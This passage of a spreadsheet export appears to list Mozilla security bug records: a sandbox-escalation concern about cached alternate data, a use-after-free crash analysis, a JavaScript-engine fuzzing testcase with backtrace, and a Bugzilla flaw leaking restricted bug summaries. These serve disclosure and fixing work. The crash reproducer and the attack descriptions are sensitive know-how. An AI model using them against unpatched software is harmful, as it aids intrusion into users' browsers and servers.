        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2599" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2599" t="inlineStr"/>
      <c r="Q2599" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2599" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2599" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2599" t="n">
        <v>1</v>
      </c>
      <c r="U2599" t="n">
        <v>0</v>
      </c>
      <c r="V2599" t="n">
        <v>3</v>
      </c>
      <c r="W2599" t="inlineStr">
        <is>
          <t>TEST-START | addon-sdk/tests/test-weak-set.test adding non object or null item
TEST-PASS | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed
TEST-PASS | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed
TEST-PASS | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed
TEST-PASS | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed
TEST-UNEXPECTED-FAIL | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed - "true is not a non-null object" matches "/^value is not a non-null object/"
TEST-INFO | Traceback (most recent call last):
  File "resource://gre/modules/Promise-backend.js", line 688, in this.PromiseWalker.scheduleWalkerLoop/&lt;
    DOMPromise.resolve().then(() =&gt; this.walkerLoop());
  File "resource://gre/modules/Promise-backend.js", line 746, in this.PromiseWalker.walkerLoop
    this.handlers.shift().process();
  File "resource://gre/modules/Promise-backend.js", line 867, in Handler.prototype.process
    nextValue = this.onResolve.call(undefined, nextValue);
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/deprecated/unit-test.js", line 522, in startMany/runNextTest/&lt;
    self.start({test: test, onDone: runNextTest});
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/deprecated/unit-test.js", line 559, in start
    this.test.testFunction(this);
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/test.js", line 75, in null
    test(assert);
  File "resource://1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack/addon-sdk/tests/test-weak-set.js", line 145, in exports["test adding non object or null item"]
    assert.throws(() =&gt; {
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/test/assert.js", line 309, in throws
    this.fail(failure);
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/test/assert.js", line 88, in fail
    this._log.fail(message);
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/deprecated/unit-test.js", line 104, in fail
    this.console.testMessage(false, false, this.test.name, message);
  File "resource://extensions.modules.1c28b511-9f9b-4b9f-a8c5-1150f420394d-at-jetpack.commonjs.path/sdk/test/harness.js", line 543, in testMessage
    this.trace();
TEST-END | addon-sdk/tests/test-weak-set.test adding non object or null item</t>
        </is>
      </c>
      <c r="X2599" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2600">
      <c r="A2600" t="n">
        <v>1426353</v>
      </c>
      <c r="B2600" t="inlineStr">
        <is>
          <t>2017-12-20 05:22:11 -0800</t>
        </is>
      </c>
      <c r="C2600" t="inlineStr">
        <is>
          <t>Do not load content process generated alternate data in the parent process.</t>
        </is>
      </c>
      <c r="D2600" t="inlineStr">
        <is>
          <t>2018-08-28 23:02:52 -0700</t>
        </is>
      </c>
      <c r="E2600" t="n">
        <v>1</v>
      </c>
      <c r="F2600" t="n">
        <v>1</v>
      </c>
      <c r="G2600" t="n">
        <v>3</v>
      </c>
      <c r="H2600" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2600" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2600" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K2600" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2600" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2600" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2600" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2600" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main60+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2600" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2600" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2600" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T2600" t="n">
        <v>1</v>
      </c>
      <c r="U2600" t="n">
        <v>0</v>
      </c>
      <c r="V2600" t="n">
        <v>29</v>
      </c>
      <c r="W2600" t="inlineStr">
        <is>
          <t>An attacker could potentially use the JSBC's Alternate Data (Bug 1405738) to escalate from the content process to the parent process.
Today, most of the alternate data content is produced by the content process, and saved in the parent process.  If an attacker has full control over a single content process it might be able to replace the alternate data associated with some JavaScript code.
The problem we face here, is if the parent process were to load the same resources, and get to execute the alternate data content provided by the hacked content process.
From what I heard, while this is not supposed to happen, that we are loading external content in privilege code, it happened in the past, and I think preventing such escalation at the cache level makes more sense too.
[Tracking Requested - why for this release]: Issue introduced by Bug 1405738.</t>
        </is>
      </c>
      <c r="X2600" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2601">
      <c r="A2601" t="n">
        <v>1282992</v>
      </c>
      <c r="B2601" t="inlineStr">
        <is>
          <t>2016-06-28 18:24:12 -0700</t>
        </is>
      </c>
      <c r="C2601" t="inlineStr">
        <is>
          <t>Yet another Use After Free in CanonicalizeXPCOMParticipant()</t>
        </is>
      </c>
      <c r="D2601" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:48 -0700</t>
        </is>
      </c>
      <c r="E2601" t="n">
        <v>1</v>
      </c>
      <c r="F2601" t="n">
        <v>1</v>
      </c>
      <c r="G2601" t="n">
        <v>3</v>
      </c>
      <c r="H2601" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2601" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2601" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2601" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L2601" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2601" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2601" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q2601" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2601" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2601" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2601" t="n">
        <v>1</v>
      </c>
      <c r="U2601" t="n">
        <v>0</v>
      </c>
      <c r="V2601" t="n">
        <v>18</v>
      </c>
      <c r="W2601" t="inlineStr">
        <is>
          <t>Created attachment 8766143
YA_UAF_CanonicalizeXPCOMParticipant_Repro.js
Steps to reproduce:
1. Run server side script YA_UAF_CanonicalizeXPCOMParticipant_Repro.js in Node.js (node YA_UAF_CanonicalizeXPCOMParticipant_Repro.js ).
2. Enter http://localhost:12345 in Firefox browser.
3. Firefox crashes at corrupted address because of a Use After Free:
Firefox version: 50.0a1 (2016-06-28)
(150.1258): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=152fe148 ebx=00000000 ecx=1d1be1a0 edx=1f9ff5ac esi=658d82ec edi=1a280520
eip=63b4eafa esp=1f9ff570 ebp=1f9ff5a0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
xul!CanonicalizeXPCOMParticipant+0xf [inlined in xul!CCGraphBuilder::NoteXPCOMChild+0x57]:
63b4eafa ff10            call    dword ptr [eax]      ds:002b:152fe148=????????
0:071&gt; !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll - 
FAULTING_IP: 
xul!CCGraphBuilder::NoteXPCOMChild+57 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\base\nscyclecollector.cpp @ 2377]
63b4eafa ff10            call    dword ptr [eax]
EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 63b4eafa (xul!CanonicalizeXPCOMParticipant+0x0000000f)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 152fe148
Attempt to read from address 152fe148
FAULTING_THREAD:  00001258
PROCESS_NAME:  firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  152fe148
READ_ADDRESS:  152fe148 
FOLLOWUP_IP: 
xul!CCGraphBuilder::NoteXPCOMChild+57 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\base\nscyclecollector.cpp @ 2377]
63b4eafa ff10            call    dword ptr [eax]
NTGLOBALFLAG:  400
APPLICATION_VERIFIER_FLAGS:  0
APP:  firefox.exe
ANALYSIS_VERSION: 10.0.10240.9 x86fre
BUGCHECK_STR:  INVALID_POINTER_READ_IN_CALL
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL
LAST_CONTROL_TRANSFER:  from 63c7962c to 63b4eafa
STACK_TEXT:  
1f9ff5a0 63c7962c 1a280520 00000000 1f9ff898 xul!CCGraphBuilder::NoteXPCOMChild+0x57
1f9ff5c4 63c79328 66080974 21b17100 1a280520 xul!mozilla::CycleCollectedJSRuntime::NoteGCThingXPCOMChildren+0x7f
1f9ff610 63c791ca 1f9ff5e8 21b17100 21b17100 xul!mozilla::CycleCollectedJSRuntime::TraverseGCThing+0x148
1f9ff624 63c790e7 1f9ff8d0 21b17100 1a280520 xul!mozilla::JSGCThingParticipant::Traverse+0x42
1f9ff644 63e0886c 1ec02af0 1138e000 00000000 xul!CCGraphBuilder::BuildGraph+0x53
1f9ff65c 63e08449 1f9ff6c0 1af45b40 00000000 xul!nsCycleCollector::MarkRoots+0x1d
1f9ff698 63c8e79f 00000001 1f9ff6c0 00000000 xul!nsCycleCollector::Collect+0xc8
1f9ff6e4 63c8e302 1f9ff6fc 63c8e2d0 00000001 xul!nsCycleCollector_collect+0x68
1f9ff6ec 63c8e2d0 00000001 1f9ff77c 1f9ff708 xul!`anonymous namespace'::WorkerJSRuntime::CustomGCCallback+0x19
1f9ff6fc 63c8e279 00000001 1f9ff71c 63c8e264 xul!mozilla::CycleCollectedJSRuntime::OnGC+0x55
1f9ff708 63c8e264 1a3cd0e8 00000001 1f9ff898 xul!mozilla::CycleCollectedJSRuntime::GCCallback+0xe
1f9ff71c 63c8e008 00000001 1a3cd2f8 1a3cd428 xul!js::gc::GCRuntime::callGCCallback+0x1a
1f9ff738 63c8df7d 00000000 00000001 1a3cd2f8 xul!`anonymous namespace'::AutoNotifyGCActivity::~AutoNotifyGCActivity+0x37
1f9ff784 63c712a1 00000001 1f9ff820 00000000 xul!js::gc::GCRuntime::gcCycle+0x17b
1f9ff810 63dbe101 00000001 00000000 ffffffff xul!js::gc::GCRuntime::collect+0xbd
1f9ff868 63dbe018 00000000 00000000 00000000 xul!js::gc::GCRuntime::gc+0x49
1f9ff878 63dbe884 1e920aa0 00000000 00000000 xul!JS_GC+0x17
1f9ffa44 63c7e2b1 1a2c5c20 1f133f00 8000ff01 xul!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x176
1f9ffab0 63c7f8c8 1e920aa0 8000ff01 1f9ffacb xul!nsThread::ProcessNextEvent+0x150
1f9ffacc 63dba72d 1f133f00 1f133f00 1f133f00 xul!NS_ProcessNextEvent+0x16
1f9ffaec 63dba625 00133f00 7e6dce61 1e920aa0 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xc0
1f9ffb24 63dba5f4 1e920aac 00000001 1d6c1b00 xul!MessageLoop::RunHandler+0x20
1f9ffb44 63dba891 0300e350 1d6c1b40 1d6c1b40 xul!MessageLoop::Run+0x19
1f9ffb6c 66d22b52 1e920aac 165518b8 66d226fb xul!nsThread::ThreadFunc+0xab
1f9ffb8c 66d22708 1d6c1b40 1f9ffbd4 6af762a4 nss3!_PR_NativeRunThread+0x9a
1f9ffb98 6af762a4 1d6c1b40 7210c316 6af76250 nss3!pr_root+0xd
1f9ffbd4 76b838f4 165518b8 76b838d0 6e2ef4c7 ucrtbase!_crt_at_quick_exit+0x104
1f9ffbe8 77265de3 165518b8 6fdc0efd 00000000 KERNEL32!BaseThreadInitThunk+0x24
1f9ffc30 77265dae ffffffff 7728b7b7 00000000 ntdll!__RtlUserThreadStart+0x2f
1f9ffc40 00000000 6af76250 165518b8 00000000 ntdll!_RtlUserThreadStart+0x1b
FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\base\nscyclecollector.cpp
FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\base\nscyclecollector.cpp
FAULTING_SOURCE_LINE_NUMBER:  2377
FAULTING_SOURCE_CODE:  
   947: static nsISupports*
   948: CanonicalizeXPCOMParticipant(nsISupports* aIn)
   949: {
   950:   nsISupports* out = nullptr;
&gt;  951:   aIn-&gt;QueryInterface(NS_GET_IID(nsCycleCollectionISupports),
   952:                       reinterpret_cast&lt;void**&gt;(&amp;out));
   953:   return out;
   954: }
   955: 
   956: static inline void
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  xul!CCGraphBuilder::NoteXPCOMChild+57
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: xul
IMAGE_NAME:  xul.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  57726fac
STACK_COMMAND:  ~71s ; kb
BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_xul!CCGraphBuilder::NoteXPCOMChild+57
PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL_xul!CCGraphBuilder::NoteXPCOMChild+57
FAILURE_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL
FAILURE_EXCEPTION_CODE:  c0000005
FAILURE_IMAGE_NAME:  xul.dll
FAILURE_FUNCTION_NAME:  CCGraphBuilder::NoteXPCOMChild
FAILURE_SYMBOL_NAME:  xul.dll!CCGraphBuilder::NoteXPCOMChild
FAILURE_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_c0000005_xul.dll!CCGraphBuilder::NoteXPCOMChild
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_in_call_c0000005_xul.dll!ccgraphbuilder::notexpcomchild
FAILURE_ID_HASH:  {29422043-bdfa-afdd-324c-83eab1baa572}
Followup:     MachineOwner
---------</t>
        </is>
      </c>
      <c r="X2601" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2602">
      <c r="A2602" t="n">
        <v>1282746</v>
      </c>
      <c r="B2602" t="inlineStr">
        <is>
          <t>2016-06-28 04:37:56 -0700</t>
        </is>
      </c>
      <c r="C2602" t="inlineStr">
        <is>
          <t>Assertion failure: comp == compartment || runtime()-&gt;isAtomsCompartment(comp) || (srcKind == JS::TraceKind::Object &amp;&amp; InCrossCompartmentMap(static_cast&lt;JSObject*&gt;(src), thing)), at js/src/jsgc.cpp:3745</t>
        </is>
      </c>
      <c r="D2602" t="inlineStr">
        <is>
          <t>2017-01-04 15:59:46 -0800</t>
        </is>
      </c>
      <c r="E2602" t="n">
        <v>1</v>
      </c>
      <c r="F2602" t="n">
        <v>1</v>
      </c>
      <c r="G2602" t="n">
        <v>3</v>
      </c>
      <c r="H2602" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2602" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2602" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2602" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L2602" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2602" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2602" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2602" t="inlineStr">
        <is>
          <t>[jsbugmon:][post-critsmash-triage][adv-main49+]</t>
        </is>
      </c>
      <c r="Q2602" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2602" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2602" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T2602" t="n">
        <v>1</v>
      </c>
      <c r="U2602" t="n">
        <v>0</v>
      </c>
      <c r="V2602" t="n">
        <v>24</v>
      </c>
      <c r="W2602" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision d87b76177b2f (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe):
function runTestCase(testcase) {}
var lfGlobal = newGlobal();
for (lfLocal in this) {
    if (!(lfLocal in lfGlobal)) {
        lfGlobal[lfLocal] = this[lfLocal];
    }
}
lfGlobal.offThreadCompileScript(`
  var p = new Proxy({}, {});
  runTestCase.prototype.__proto__ = p;
  fullcompartmentchecks(true);
`);
lfGlobal.runOffThreadScript();
Backtrace:
 received signal SIGSEGV, Segmentation fault.
0x0000000000975cd0 in CompartmentCheckTracer::onChild (this=this@entry=0x7fffffffcfd0, thing=...) at js/src/jsgc.cpp:3743
#0  0x0000000000975cd0 in CompartmentCheckTracer::onChild (this=this@entry=0x7fffffffcfd0, thing=...) at js/src/jsgc.cpp:3743
#1  0x0000000000d57c5c in JS::CallbackTracer::onShapeEdge (shapep=0x7ffff7e74648, this=0x7fffffffcfd0) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/TracingAPI.h:131
#2  JS::CallbackTracer::dispatchToOnEdge (shapep=0x7ffff7e74648, this=0x7fffffffcfd0) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/TracingAPI.h:209
#3  DoCallback&lt;js::Shape*&gt; (trc=0x7fffffffcfd0, thingp=0x7ffff7e74648, name=&lt;optimized out&gt;) at js/src/gc/Tracer.cpp:51
#4  0x0000000000a09fb7 in js::ProxyObject::trace (trc=0x7fffffffcfd8, obj=0x7ffff7e74640) at js/src/proxy/Proxy.cpp:619
#5  0x000000000094546f in js::Class::doTrace (this=&lt;optimized out&gt;, obj=0x7ffff7e74640, trc=0x7fffffffcfd8) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Class.h:815
#6  JSObject::traceChildren (this=0x7ffff7e74640, trc=0x7fffffffcfd8) at js/src/jsobj.cpp:3890
#7  0x0000000000d3b28a in js::TraceChildren (trc=trc@entry=0x7fffffffcfd8, thing=0x7ffff7e74640, kind=kind@entry=JS::TraceKind::Object) at js/src/gc/Tracer.cpp:126
#8  0x000000000093f0ad in js::gc::GCRuntime::checkForCompartmentMismatches (this=this@entry=0x7ffff6965608) at js/src/jsgc.cpp:3769
#9  0x0000000000976608 in js::gc::GCRuntime::checkForCompartmentMismatches (this=0x7ffff6965608) at js/src/jsgc.cpp:3811
#10 js::gc::GCRuntime::beginMarkPhase (this=this@entry=0x7ffff6965608, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, lock=...) at js/src/jsgc.cpp:3799
#11 0x000000000097b1e6 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x7ffff6965608, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, lock=...) at js/src/jsgc.cpp:5919
#12 0x000000000097c6ef in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff6965608, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6204
#13 0x000000000097cdb6 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff6965608, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6312
#14 0x000000000097d1ab in js::gc::GCRuntime::gc (this=this@entry=0x7ffff6965608, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6379
#15 0x0000000000b289cf in JSRuntime::destroyRuntime (this=this@entry=0x7ffff69651c8) at js/src/vm/Runtime.cpp:430
#16 0x0000000000910569 in JSContext::~JSContext (this=0x7ffff6965000, __in_chrg=&lt;optimized out&gt;) at js/src/jscntxt.cpp:892
#17 0x00000000009108ab in js_delete_poison&lt;JSContext&gt; (p=0x7ffff6965000) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Utility.h:392
#18 js::DestroyContext (cx=0x7ffff6965000) at js/src/jscntxt.cpp:133
#19 0x0000000000896bf7 in JS_DestroyRuntime (rt=rt@entry=0x7ffff69651c8) at js/src/jsapi.cpp:476
#20 0x0000000000438578 in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:7452
rax	0x0	0
rbx	0x7fffffffcd30	140737488342320
rcx	0x7ffff6c28a2d	140737333332525
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffffcdd0	140737488342480
rsp	0x7fffffffcce0	140737488342240
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fdc740	140737353992000
r10	0x58	88
r11	0x7ffff6b9f750	140737332770640
r12	0x7ffff7ed1718	140737352898328
r13	0x7ffff7e74640	140737352517184
r14	0xfffa7fffffffffff	-1548112371908609
r15	0xfffc000000000000	-1125899906842624
rip	0x975cd0 &lt;CompartmentCheckTracer::onChild(JS::GCCellPtr const&amp;)+864&gt;
=&gt; 0x975cd0 &lt;CompartmentCheckTracer::onChild(JS::GCCellPtr const&amp;)+864&gt;:	movl   $0x0,0x0
   0x975cdb &lt;CompartmentCheckTracer::onChild(JS::GCCellPtr const&amp;)+875&gt;:	ud2    
This might be a dup to one of the previous GC bugs on file, but I'm not sure because the assertion here is new. Marking s-s because GC is involved.</t>
        </is>
      </c>
      <c r="X2602" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2603">
      <c r="A2603" t="n">
        <v>209376</v>
      </c>
      <c r="B2603" t="inlineStr">
        <is>
          <t>2003-06-14 05:12:22 -0700</t>
        </is>
      </c>
      <c r="C2603" t="inlineStr">
        <is>
          <t>Can access summary for secure bug if its been voted on.</t>
        </is>
      </c>
      <c r="D2603" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:36 -0800</t>
        </is>
      </c>
      <c r="E2603" t="n">
        <v>1</v>
      </c>
      <c r="F2603" t="n">
        <v>1</v>
      </c>
      <c r="G2603" t="n">
        <v>4</v>
      </c>
      <c r="H2603" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2603" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2603" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2603" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L2603" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2603" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2603" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2603" t="inlineStr">
        <is>
          <t>[fixed in 2.16.4] [fixed in 2.17.5]</t>
        </is>
      </c>
      <c r="Q2603" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2603" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2603" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2603" t="n">
        <v>1</v>
      </c>
      <c r="U2603" t="n">
        <v>0</v>
      </c>
      <c r="V2603" t="n">
        <v>20</v>
      </c>
      <c r="W2603" t="inlineStr">
        <is>
          <t>If someone has voted on a bug which is restricted in some way, we can look at
their user's voting page and get teh summary of the bug.
This is because the CanSeeBug check uses $who, but $who is the user we're
looking at, not the current user.
I noticed this while looking into bug 193575. You need to know the email of
someone who has voted on the bug, though.
I think the fix is to just grab the Bugzilla-&gt;user-&gt;id, but I'm not sure. Theres
a lot of odd stuff in the code - the comment about
    # After DBNameToIdAndCheck is templatised and prints a Content-Type,
    # the above should revert to a call to that function, and this
    # special error handling should go away.
looks really old, too.
(I'm also not sure what all that LOCKing is about, but thats a separate bug)
Gerv?</t>
        </is>
      </c>
      <c r="X2603" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2604">
      <c r="A2604" t="n">
        <v>498897</v>
      </c>
      <c r="B2604" t="inlineStr">
        <is>
          <t>2009-06-17 07:21:02 -0700</t>
        </is>
      </c>
      <c r="C2604" t="inlineStr">
        <is>
          <t>Web code gets "permission denied" error if a content policy is present</t>
        </is>
      </c>
      <c r="D2604" t="inlineStr">
        <is>
          <t>2009-09-18 14:18:00 -0700</t>
        </is>
      </c>
      <c r="E2604" t="n">
        <v>1</v>
      </c>
      <c r="F2604" t="n">
        <v>1</v>
      </c>
      <c r="G2604" t="n">
        <v>3</v>
      </c>
      <c r="H2604" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2604" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2604" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2604" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2604" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2604" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2604" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2604" t="inlineStr">
        <is>
          <t>[sg:critical?][1.9.1 fix in bug 499910] testcase in bug 499910</t>
        </is>
      </c>
      <c r="Q2604" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2604" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2604" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2604" t="n">
        <v>1</v>
      </c>
      <c r="U2604" t="n">
        <v>0</v>
      </c>
      <c r="V2604" t="n">
        <v>45</v>
      </c>
      <c r="W2604" t="inlineStr">
        <is>
          <t>Created attachment 383707
Minimal content policy for testing
I reproduced this issue with 20090616031659 Minefield nightly and with 20090617032001 Shiretoko nightly, everything works fine in Firefox 3.0.11 however. Functionality of market.yandex.ru website is broken if any JavaScript-based content policy is present. In particular, the panel on the right (the one with orange border) doesn't load. I see two errors in the console:
Error: Permission denied for &lt;http://market.yandex.ru&gt; to call method HTMLDocument.createComment on &lt;&gt;.
Source File: http://js.static.yandex.net/jquery/1.3.2/_jquery.js
Line: 19
Error: Permission denied for &lt;http://market.yandex.ru&gt; to get property HTMLDocument.compatMode from &lt;&gt;.
Source File: http://lego.static.yandex.net/2.0/common/js/_common.js
Line: 1
There are more errors but I guess that those are follow-up errors. The website uses http://suggest.market.yandex.ru/jquery.crossframeajax.html frame for cross-site communication, I guess that's where the errors come from. I will try to analyze further but the way this site works is pretty complex (packed jQuery doesn't make it easier either).
Steps to reproduce:
1. Download nsTestPolicy.js from the attachment and put it into "c:\Program files\Mozilla Firefox\components" directory (adjust the path if the Firefox installation directory is different for you).
2. Put an .autoreg file into your Firefox profile.
3. Start Firefox.
